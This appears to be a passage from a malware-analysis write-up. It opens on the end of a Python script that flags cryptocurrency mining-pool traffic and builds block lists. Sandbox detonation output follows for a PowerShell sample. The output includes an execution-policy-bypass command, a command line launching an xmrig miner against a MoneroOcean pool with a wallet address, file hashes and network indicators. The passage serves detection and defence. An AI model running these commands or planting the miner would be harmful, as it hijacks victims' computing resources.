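

def triage(rows):
    """Flag pool DNS lookups and pool TCP sessions; note whether a GitHub download came first."""
    findings = []
    github_download_seen = False
    for r in rows:
        if is_ptr_noise(r):
            continue
        if r["proto"] == "tcp" and r["port"] == 443 and r["domain"] == "objects.githubusercontent.com":
            github_download_seen = True  # release asset fetch, the miner drop in this report
        pool = pool_suffix(r["domain"])
        if not pool:
            continue
        if r["proto"] == "udp" and r["port"] == 53:
            findings.append({"type": "mining_pool_dns_query", "domain": r["domain"], "pool": pool})
        elif r["proto"] == "tcp":
            findings.append({"type": "mining_pool_connection", "domain": r["domain"],
                             "ip": r["ip"], "port": r["port"], "pool": pool,
                             "nonstandard_port": r["port"] not in (80, 443),
                             "preceded_by_github_download": github_download_seen})
    return findings


def network_iocs(findings):
    """Block-list material: the pool endpoint(s) as 'ip:port' plus every flagged domain."""
    endpoints = {f"{f['ip']}:{f['port']}" for f in findings if f["type"] == "mining_pool_connection"}
    return sorted(endpoints | {f["domain"] for f in findings})


if __name__ == "__main__":
    found = triage(parse_rows(REPORT_ROWS))
    for f in found:
        print(f)
    print(network_iocs(found))
```

Block the domain rather than only the resolved address: the pool name is what the sample carries on its command line, while the address it resolves to can change between runs.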
Files
memory/2224-0-0x00007FFC51413000-0x00007FFC51415000-memory.dmp
memory/2224-1-0x000002180B510000-0x000002180B532000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iicdyhag.nu0.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2224-11-0x00007FFC51410000-0x00007FFC51ED1000-memory.dmp
memory/2224-12-0x00007FFC51410000-0x00007FFC51ED1000-memory.dmp
memory/2224-14-0x00007FFC51410000-0x00007FFC51ED1000-memory.dmp
memory/2224-15-0x0000021823B30000-0x0000021823B42000-memory.dmp
memory/2224-16-0x000002180B5B0000-0x000002180B5BA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral10
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:00
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1781s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1448 wrote to memory of 4808 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1448 wrote to memory of 4808 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_agfdoilp.zui.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral25
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:01
Platform
win10v2004-20240508-en
Max time kernel
1741s
Max time network
1751s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 52.111.229.43:443 | | tcp |
Files
memory/3040-0-0x00007FF980EF3000-0x00007FF980EF5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x0icrmrz.dys.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |